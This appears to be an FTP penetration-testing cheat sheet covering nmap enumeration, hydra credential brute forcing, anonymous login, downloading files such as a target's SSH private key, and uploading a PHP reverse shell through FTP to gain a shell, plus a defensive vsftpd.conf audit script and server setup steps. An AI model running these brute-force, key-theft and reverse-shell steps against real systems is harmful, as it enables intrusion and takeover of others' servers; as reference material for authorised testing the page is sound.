FTP (File Transfer Protocol) Pentesting
Last modified: 2024-01-26
FTP is a standard communication protocol used for the transfer of computer files from a server to a client on a computer network. Default ports are 20 (for data), 21 (for control).
Enumeration
nmap --script ftp-anon -p 21 <target-ip>
nmap --script ftp-vuln* -p 21 <target-ip>
nmap --script ftp-* -p 21 <target-ip>
Brute Force Credentials
hydra -l username -P passwords.txt <target-ip> ftp
hydra -L usernames.txt -p password <target-ip> ftp
hydra -l username -P passwords.txt ftp://<target-ip>
hydra -L usernames.txt -p password ftp://<target-ip>
Investigation
Banner Grabbing
nc <target-ip> 21
Using OpenSSL
First, connect to the control port with netcat.
nc -vn <target-ip> 21
Then run the command below.
openssl s_client -connect <target-ip>:21 -starttls ftp
Configuration Files
cat /etc/vsftpd.conf
cat /etc/vsftpd/vsftpd.conf
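What to look for in that file, from the defender's side: the sketch below is an added example (not part of the original page or of vsftpd) that parses a vsftpd.conf and flags the settings behind the anonymous login, upload and cleartext issues covered on this page. Option names and built-in defaults follow the vsftpd.conf(5) man page; the function names and the sample configuration are constructed for illustration.

```python
# Added example: audit a vsftpd.conf for the weaknesses this page tests for.
# Built-in defaults per vsftpd.conf(5); a packaged config file may override them.
DEFAULTS = {
    "anonymous_enable": "YES",   # built-in default accepts anonymous login
    "write_enable": "NO",
    "anon_upload_enable": "NO",
    "local_enable": "NO",
    "chroot_local_user": "NO",
    "ssl_enable": "NO",
    "xferlog_enable": "NO",
}

def parse_vsftpd_conf(text):
    """Return effective settings: built-in defaults overridden by the file."""
    settings = dict(DEFAULTS)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)   # format is option=value, no spaces
        settings[key] = value.strip()
    return settings

def audit(text):
    """Return a list of (option, finding) tuples for risky settings."""
    s = parse_vsftpd_conf(text)
    on = lambda k: s.get(k, "NO").upper() == "YES"
    findings = []
    if on("anonymous_enable"):
        findings.append(("anonymous_enable", "anonymous login is accepted"))
        # Anonymous upload needs write_enable as well as anon_upload_enable.
        if on("write_enable") and on("anon_upload_enable"):
            findings.append(("anon_upload_enable", "anonymous users can upload files"))
    if not on("ssl_enable"):
        findings.append(("ssl_enable", "credentials and data are sent in cleartext"))
    if on("local_enable") and not on("chroot_local_user"):
        findings.append(("chroot_local_user", "local users are not chrooted by this option"))
    if not on("xferlog_enable"):
        findings.append(("xferlog_enable", "uploads and downloads are not logged"))
    return findings

# Constructed sample configuration, not taken from a real host.
SAMPLE = """\
# anonymous_enable is not set, so the built-in default applies
write_enable=YES
anon_upload_enable=YES
local_enable=YES
xferlog_enable=YES
"""

if __name__ == "__main__":
    for option, finding in audit(SAMPLE):
        print(f"{option}: {finding}")
```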
Connect
Using ftp
ftp <target-ip>
ftp <target-ip> <target-port>
Sometimes we might be able to log in anonymously.
Not likely, but worth a try.
ftp <target-ip>
username: anonymous
password: anonymous
Using lftp
lftp is an enhanced version of ftp. It's easier to use than ftp.
lftp
lftp :-> connect
# or
lftp 10.0.0.1
# Login with username and password
lftp 10.0.0.1:-> login username password
Commands in FTP
After connecting to FTP, we can browse directories and files, download them to our local machine, and upload local files to the target system.
The FTP commands are almost the same as Linux commands.
ftp> pwd
ftp> cd
ftp> ls
# Print the content of the file
ftp> get example.txt -
# Switch to passive mode.
ftp> passive
# Print usage
ftp> ?
Download Files
To download files to the local machine:
ftp> get example.txt
ftp> get home/user/.ssh/id_rsa ./id_rsa
# recursive
wget -r --user='username' --password='password' ftp://<target-ip>/sample
Upload Files
ftp> put example.txt
Reverse Shell over Website
If the target website allows users to access the FTP directory, we can upload a reverse shell payload and get a shell.
- Download the Payload
Get the payload for the reverse shell from this repository.
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
# --------------------------------------------------------------------------------
# Edit some variables in shell.php
$ip = '<your-local-ip>';
$port = 1234;
- Upload the Payload to FTP Directory
Connect to FTP and upload the payload.
ftp <target-ip>
# Upload the payload you downloaded
ftp> put shell.php
- Get a Shell
First, we need to open a listener on our local machine.
nc -lvnp 1234
In a web browser, access "http://vulnerable.com/path/to/ftp/shell.php".
We should get a shell on the target.
Start FTP Server
1. Install vsftpd
sudo apt install vsftpd
To check the config file for vsftpd, run the following command.
less /etc/vsftpd.conf
2. Start FTP Server
Below are the commands for starting the FTP server and checking its status.
sudo systemctl start vsftpd
sudo systemctl status vsftpd
If you’ve updated the config file, you need to restart vsftpd.
sudo systemctl restart vsftpd